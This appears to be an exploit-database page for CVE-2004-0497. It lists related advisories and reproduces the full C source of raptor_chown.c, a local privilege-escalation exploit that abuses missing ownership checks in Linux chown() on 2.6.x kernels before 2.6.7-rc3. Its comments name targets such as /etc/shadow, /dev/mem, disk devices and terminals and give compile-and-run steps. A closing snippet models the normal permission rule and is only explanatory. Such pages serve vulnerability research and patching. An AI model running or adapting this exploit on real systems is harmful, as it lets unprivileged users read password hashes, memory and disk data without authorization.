| Title | Published | Views | Family |
|---|---|---|---|
| Linux Kernel 2.6.x < 2.6.7-rc3 - sys_chown() Privilege Escalation Exploit | 8 Nov 2016 00:00 | – | zdt |
| Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit | 24 Dec 2004 00:00 | – | zdt |
| CVE-2004-0497 | 6 Jul 2004 04:00 | – | cve |
| CVE-2004-0497 | 6 Jul 2004 04:00 | – | cvelist |
| Linux Kernel < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation | 24 Dec 2004 00:00 | – | exploitdb |
| EUVD-2004-0496 | 7 Oct 2025 00:30 | – | euvd |
| Linux Kernel 2.6.7-rc3 (Slackware 9.1 Debian 3.0) - sys_chown() Group Ownership Alteration Privilege Escalation | 24 Dec 2004 00:00 | – | exploitpack |
| Fedora Core 2 : kernel-2.6.6-1.435.2.3 (2004-205) | 23 Jul 2004 00:00 | – | nessus |
| Fedora Core 1 : kernel-2.4.22-1.2197.nptl (2004-206) | 23 Jul 2004 00:00 | – | nessus |
| GLSA-200407-16 : Linux Kernel: Multiple DoS and permission vulnerabilities | 30 Aug 2004 00:00 | – | nessus |

```c
/*
 * $Id: raptor_chown.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
 *
 * raptor_chown.c - sys_chown missing DAC controls on Linux
 * Copyright (c) 2004 Marco Ivaldi <[email protected]>
 *
 * Unknown vulnerability in Linux kernel 2.x may allow local users to
 * modify the group ID of files, such as NFS exported files in kernel
 * 2.4 (CAN-2004-0497).
 *
 * "Basically, you can change the group of a file you don't own, but not
 * of an SGID executable." -- Solar Designer (0dd)
 *
 * On Linux 2.6.x < 2.6.7-rc3 it's possible to change the group of files you
 * don't own, even on local filesystems. This may allow a local attacker to
 * perform a privilege escalation, e.g. through the following attack vectors:
 *
 * 1) Target /etc/shadow: on some distros (namely slackware 9.1 and debian
 *    3.0, probably others) the shadow group has read access to it.
 * 2) Target /dev/mem, /dev/kmem: read arbitrary memory contents.
 * 3) Target /dev/hd*, /dev/sd*: read arbitrary data stored on disks.
 * 4) Target /dev/tty*, /dev/pts*: snoop/execute arbitrary commands.
 *
 * Usage:
 * $ gcc raptor_chown.c -o raptor_chown -Wall
 * $ ./raptor_chown /etc/shadow
 * [...]
 * -rw-r----- 1 root users 500 Mar 25 12:27 /etc/shadow
 *
 * Vulnerable platforms:
 * Linux 2.2.x (on nfs exported files, should be vuln) [untested]
 * Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) [tested]
 * Linux 2.6.x < 2.6.7-rc3 (default configuration) [tested]
 */

#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>

#define INFO1 "raptor_chown.c - sys_chown missing DAC controls on Linux"
#define INFO2 "Copyright (c) 2004 Marco Ivaldi <[email protected]>"

int main(int argc, char **argv)
{
	char cmd[256];

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* read command line */
	if (argc != 2) {
		fprintf(stderr, "usage: %s file_name\n\n", argv[0]);
		exit(1);
	}

	/* ninpou: sys_chown no jutsu! */
	if (chown(argv[1], -1, getgid()) < 0) {
		switch (errno) {
		case EPERM:
			fprintf(stderr, "Error: Not vulnerable!\n");
			break;
		default:
			perror("Error");
		}
		exit(1);
	}
	fprintf(stderr, "Ninpou: sys_chown no jutsu!\n");

	/* print some output (bounded write: argv[1] may be longer than cmd) */
	snprintf(cmd, sizeof(cmd), "/bin/ls -l %s", argv[1]);
	system(cmd);

	exit(0);
}
```
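
The PoC above reports "Not vulnerable!" when `chown()` fails with `EPERM`. As an added illustration (not code from the original page, the exploit author, or the kernel), the following user-space model shows the standard DAC ownership rule that such a call is expected to hit; `struct caller`, `chown_dac_check` and the sample uid/gid values are hypothetical.

```c
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/types.h>

/* Hypothetical model of the caller's credentials (not a kernel structure). */
struct caller {
    uid_t fsuid;          /* uid used for filesystem permission checks */
    const gid_t *groups;  /* primary plus supplementary groups */
    size_t ngroups;
    bool cap_chown;       /* caller holds CAP_CHOWN, e.g. root */
};

/* Constructed sample: unprivileged uid 1000 whose only group is gid 100. */
static const gid_t sample_groups[] = { 100 };
static const struct caller sample_user = { 1000, sample_groups, 1, false };

static bool in_groups(const struct caller *c, gid_t gid)
{
    for (size_t i = 0; i < c->ngroups; i++)
        if (c->groups[i] == gid)
            return true;
    return false;
}

/* Returns 0 if chown(new_uid, new_gid) passes DAC, EPERM otherwise.
 * As with chown(2), an id of -1 means "leave unchanged". */
int chown_dac_check(const struct caller *c, uid_t file_uid, gid_t file_gid,
                    uid_t new_uid, gid_t new_gid)
{
    if (c->cap_chown)
        return 0;
    /* Owner: an unprivileged caller may only "change" it to itself. */
    if (new_uid != (uid_t)-1 && (c->fsuid != file_uid || new_uid != file_uid))
        return EPERM;
    /* Group: caller must own the file and be a member of the new group. */
    if (new_gid != (gid_t)-1 && (c->fsuid != file_uid ||
        (new_gid != file_gid && !in_groups(c, new_gid))))
        return EPERM;
    return 0;
}

int main(void)
{
    /* The call shape on this page: group-only change on a root-owned file. */
    int rc = chown_dac_check(&sample_user, 0, 42, (uid_t)-1, 100);
    printf("root:42 file, caller uid 1000 -> %s\n", rc == EPERM ? "EPERM" : "allowed");
    return 0;
}
```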